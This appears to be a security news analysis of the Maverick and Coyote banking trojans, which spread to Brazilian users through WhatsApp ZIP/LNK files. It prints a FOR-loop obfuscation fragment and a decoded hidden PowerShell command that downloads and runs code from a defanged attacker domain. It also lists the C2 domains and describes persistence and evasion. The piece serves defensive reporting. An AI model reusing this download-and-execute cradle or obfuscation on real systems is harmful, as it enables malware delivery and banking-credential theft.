Unveiling the Connection: Maverick and Coyote Banking Trojans Targeting Brazilian Financial Institutions
Recent investigations by CyberProof security researchers have revealed significant connections between two sophisticated banking trojans, Maverick and Coyote, both of which are actively targeting Brazilian users and financial institutions. These malware campaigns exhibit striking similarities in their infection methodologies, code structures, and operational behaviors, suggesting a shared origin or collaborative development.
Discovery and Initial Findings
The Maverick banking malware came to light when analysts detected suspicious file downloads occurring through WhatsApp, a popular messaging platform in Brazil. Upon closer examination, these downloads were found to be part of a complex, multi-stage infection process that closely mirrors the tactics employed by the previously identified Coyote malware.
Infection Chain and Technical Analysis
Both Maverick and Coyote initiate their attacks by distributing malicious ZIP files via WhatsApp messages. These archives contain LNK (shortcut) files that, when executed, trigger heavily obfuscated PowerShell commands designed to evade detection mechanisms. The obfuscation techniques include the use of Base64 and UTF-16LE encoding, as well as intricate string concatenation methods.
For instance, the malware constructs commands through complex FOR loops, splitting executable names and parameters into fragments to bypass monitoring. An analyzed sample demonstrated the following obfuscation pattern:
“`
for %y in (pow) do for %c in (er) do for %V in (shel)
do for %q in (1.e) do for %A in (xe) do
%y%c%V%q%A → powershell.exe
“`
Once decoded, the PowerShell command contacts attacker-controlled infrastructure to download additional payloads. The decoded command establishes connections to malicious domains for further infection:
“`
powershell.exe -w hid -enc IEX (New-Object Net.WebClient).
DownloadString(‘hxxps://zapgrande[.]com/api/itbi/BrDLwQ4tU70z’)
“`
Persistence Mechanisms and Evasion Strategies
To maintain persistence on the infected system, the malware drops batch files into the Windows startup folder. These files follow a naming convention of HealthApp- followed by a GUID and a .bat extension. This method ensures that the malware is executed each time the system starts, establishing outbound connections to command-and-control servers hosted on domains such as sorvetenopote[.]com and zapgrande[.]com.
Both Maverick and Coyote perform extensive victim profiling before activating their banking theft functionalities. They verify the system’s timezone settings, locale configurations, regional settings, and date formats to confirm that the infected machine is located in Brazil. If these criteria are not met, the malware terminates itself, thereby reducing the risk of detection and analysis by researchers outside the targeted region.
Encryption Techniques and Targeted Institutions
A notable similarity between the two malware families is their use of AES encryption combined with GZIP compression in CBC mode to decrypt stored banking URLs from Base64-encoded strings. This encryption method, along with nearly identical banking monitoring code, strongly indicates a shared development origin.
The malware monitors web browsers including Chrome, Firefox, Edge, Opera, and Brave for connections to over 50 Brazilian financial institutions. Upon detecting a connection to one of these institutions, the malware can execute overlay attacks, keylogging, and other techniques to steal sensitive banking credentials and financial information.
Implications and Recommendations
The discovery of the strong links between Maverick and Coyote underscores the evolving sophistication of cyber threats targeting the financial sector in Brazil. The use of popular communication platforms like WhatsApp for malware distribution highlights the need for increased vigilance among users and organizations.
To mitigate the risks associated with these malware campaigns, it is recommended that individuals and organizations:
– Exercise Caution with Unsolicited Messages: Be wary of unexpected messages containing attachments or links, even if they appear to come from known contacts.
– Implement Robust Security Measures: Utilize up-to-date antivirus and anti-malware solutions capable of detecting and preventing such sophisticated threats.
– Educate Users: Conduct regular training sessions to inform users about the latest phishing tactics and social engineering techniques employed by cybercriminals.
– Monitor Network Traffic: Keep an eye on network traffic for unusual activities, such as connections to known malicious domains or unexpected data exfiltration.
By adopting these proactive measures, individuals and organizations can enhance their defenses against the growing threat posed by banking trojans like Maverick and Coyote.
